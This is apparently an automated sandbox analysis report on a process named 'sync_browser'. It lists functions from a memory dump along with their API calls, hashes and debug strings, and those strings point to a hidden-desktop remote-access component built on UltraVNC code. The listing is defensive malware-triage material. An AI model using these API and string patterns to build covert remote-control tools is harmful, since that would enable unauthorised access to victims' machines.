Instruction ID: 460c7d5bc55520ec72d96e413978c40d133c91d589c0a170d4223a9cb6a01770
Opcode Fuzzy Hash: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
Instruction Fuzzy Hash: 19218636629BC192F608CB60E5441E9B3A8FB54B50F544636E7AD97795DF3CE069C300

Function 00007FF67E82A130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E82A183

Strings

Default, xrefs: 00007FF67E82A1CC

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopInputOpen
String ID: Default
API String ID: 601053899-753088835
Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction ID: cd5f6c3f6b0dd26f6af2da52317e98fab472a14e3393cfa286c27bb3ca32af1d
Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction Fuzzy Hash: B4218136B2C68281E721DB15B4153FAA395FFA9754F840431EA9E87795DF2CD018CB00

Function 00007FF67E7CA830 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF67E7CA88F
GetLastError.KERNEL32 ref: 00007FF67E7CA899

Strings

HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF67E7CA89F
HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF67E7CA8B0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
API String ID: 2777246624-1049114938
Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
Instruction ID: 5316b763691ce82a2aced02f5d9cb63be24ec9e1f75e249eedb31c53ee5893e7
Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
Instruction Fuzzy Hash: E6215337A28A8286E714CF11F4402A5B7A8FB55748F540235FA9E97A69DF3CE54AC700

Function 00007FF67E7CA550 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CA440: RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7CA465
Part of subcall function 00007FF67E7CA440: RegQueryValueExA.ADVAPI32 ref: 00007FF67E7CA49F
Part of subcall function 00007FF67E7CA440: RegCloseKey.ADVAPI32 ref: 00007FF67E7CA4AA

SystemParametersInfoA.USER32 ref: 00007FF67E7CA594
SystemParametersInfoA.USER32 ref: 00007FF67E7CA5AC

Part of subcall function 00007FF67E7CA390: LoadLibraryA.KERNEL32 ref: 00007FF67E7CA3A6
Part of subcall function 00007FF67E7CA390: LoadLibraryA.KERNEL32 ref: 00007FF67E7CA3CB
Part of subcall function 00007FF67E7CA390: GetProcAddress.KERNEL32 ref: 00007FF67E7CA3E3
Part of subcall function 00007FF67E7CA390: FreeLibrary.KERNEL32 ref: 00007FF67E7CA407

Strings

HideDesktop.cpp : Killwallpaper %i, xrefs: 00007FF67E7CA55B
HideDesktop.cpp : Killwallpaper %i %i, xrefs: 00007FF67E7CA5C1

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
API String ID: 542764273-2415377678
Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction ID: 8dbaf1849b34b050d31b4e2dc379e5dff346be4b56735bc86ddca8000eac802c
Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction Fuzzy Hash: 3F011B77E2854396F7509F60E8046B57769BB74309F404132F80E976A6DE3CA21EC751

Function 00007FF67E87AB9C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF67E87ABE5,?,?,00000028,00007FF67E878C7D,?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749), ref: 00007FF67E87ABAB
GetProcAddress.KERNEL32(?,?,000000FF,00007FF67E87ABE5,?,?,00000028,00007FF67E878C7D,?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749), ref: 00007FF67E87ABC0

Strings

mscoree.dll, xrefs: 00007FF67E87ABA4
CorExitProcess, xrefs: 00007FF67E87ABB6

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
Instruction ID: ccf63851f2a67b5a5d4badf5087875c8a898214f7d09681255fbc36262220515
Opcode Fuzzy Hash: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
Instruction Fuzzy Hash: 88E01213F3670282FE199BE1A89557453519F78740F4814B8D45E8A390EE2CF59DC300

Function 00007FF67E7EA580 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7EA75F
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7EA78F

Strings

i, xrefs: 00007FF67E7EA754
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF67E7EA5D6

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
API String ID: 3168844106-2727237473
Opcode ID: 04e423f7ce06a793ccdcdf8c84ad800bad76bca22520f4e944dcdf361ee1b220
Instruction ID: 62a26dad7513a79d02895e1982034da0969249615f830963d62525fdc270fb46
Opcode Fuzzy Hash: 04e423f7ce06a793ccdcdf8c84ad800bad76bca22520f4e944dcdf361ee1b220
Instruction Fuzzy Hash: E261CC23B28BC295EA65CB25D4447FA67A0FB96794F044235EA9D877C5DF3CD488C700

Function 00007FF67E7D0B70 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetRegionData.GDI32 ref: 00007FF67E7D0C9E
GetRegionData.GDI32 ref: 00007FF67E7D0CCB
GetRegionData.GDI32 ref: 00007FF67E7D0CF6
DeleteObject.GDI32 ref: 00007FF67E7D0D1D

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DataRegion$DeleteObject
String ID:
API String ID: 3467850875-0
Opcode ID: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
Instruction ID: 8242c6095501188df10554828d8089a66c4dd85e18913b75c38cc1c6383eedff
Opcode Fuzzy Hash: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
Instruction Fuzzy Hash: 1051DFB7A15A818BD790CF29D440AADB7E5FB58B98B55A132EA4DC3350DF3CD885CB00

Function 00007FF67E888704 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF67E888718

Part of subcall function 00007FF67E8877D0: _amsg_exit.LIBCMT ref: 00007FF67E8877FA

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF67E8887D0
free.LIBCMT ref: 00007FF67E8887E5
EnterCriticalSection.KERNEL32 ref: 00007FF67E888807

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
String ID:
API String ID: 3786353176-0
Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
Instruction ID: 65601c50415b2af002aee0faf382b18fbfb797f9d9bd64cd5e79d7af15eef1a1
Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
Instruction Fuzzy Hash: 28418E27A38A4286FB109B15E454339B3A1FF64B84F544536EE9D8B6A1DF3CE848C304

Function 00007FF67E7CC590 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF67E7CC5D4

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

Strings

VUUU, xrefs: 00007FF67E7CC658
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00007FF67E7CC5F8
VUUU, xrefs: 00007FF67E7CC5B3

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeap_callnewhmalloc
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
API String ID: 908589684-1814909704
Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction ID: aa5bee93cca6aa707d176948b987c4409cc35d89a246433cef606fc3aa613333
Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction Fuzzy Hash: 75219C33B287954AD350CB69E840228B799E764790F092336FBAC8BBD5DE3ED006C700

Function 00007FF67E7D7650 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E877978: malloc.LIBCMT ref: 00007FF67E877992

Sleep.KERNEL32 ref: 00007FF67E7D7720

Part of subcall function 00007FF67E7D7A30: SetEvent.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A4B
Part of subcall function 00007FF67E7D7A30: SetEvent.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A55
Part of subcall function 00007FF67E7D7A30: SetEvent.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A5F
Part of subcall function 00007FF67E7D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A8B
Part of subcall function 00007FF67E7D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A95

Strings

keyEvent, xrefs: 00007FF67E7D76BE
stop_event, xrefs: 00007FF67E7D76E0
start_event, xrefs: 00007FF67E7D7703

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Event$CriticalInitializeSection$Sleepmalloc
String ID: keyEvent$start_event$stop_event
API String ID: 367317321-1979648887
Opcode ID: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
Instruction ID: ff2e80b9284086d06a69bc78a252dc9502b4f138f12699051c9f394bb91ec106
Opcode Fuzzy Hash: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
Instruction Fuzzy Hash: 9D31492BE39A4340FA60EB54E554776A391AFA6754F640035F94E8FBA2DE7CE44CC340

Function 00007FF67E8799CC Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF67E879923
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87992E
_errno.LIBCMT ref: 00007FF67E879960
_errno.LIBCMT ref: 00007FF67E879972

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction ID: 5a10487601a5c05499e4dd3c24c7e81d557663bd5bfae4ebd2db87f10d770eab
Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction Fuzzy Hash: 40217F23B2924345F7615AB5580133DE294AF69BC0F454431F98DC7B86DE2CE854C700

Function 00007FF67E843CA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF67E843CCE

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

free.LIBCMT ref: 00007FF67E843CFA

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

free.LIBCMT ref: 00007FF67E843D0E

Strings

Unable to allocate memory in zip library at %s, xrefs: 00007FF67E843D18

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: Unable to allocate memory in zip library at %s
API String ID: 1063416079-1743894623
Opcode ID: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
Instruction ID: ae399c8f34e9911cb37ff90014563b65a5c6687f31605dc6281fe98264fe7a68
Opcode Fuzzy Hash: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
Instruction Fuzzy Hash: 4611B122639BC285EA50DF55E440179B764FBA5BD4F080132FA9D87796DE2CE4498704

Function 00007FF67E831660 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00007FF67E8316AC
GlobalFree.KERNEL32 ref: 00007FF67E8316C5
GlobalUnlock.KERNEL32 ref: 00007FF67E831704
GlobalFree.KERNEL32 ref: 00007FF67E83171D

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
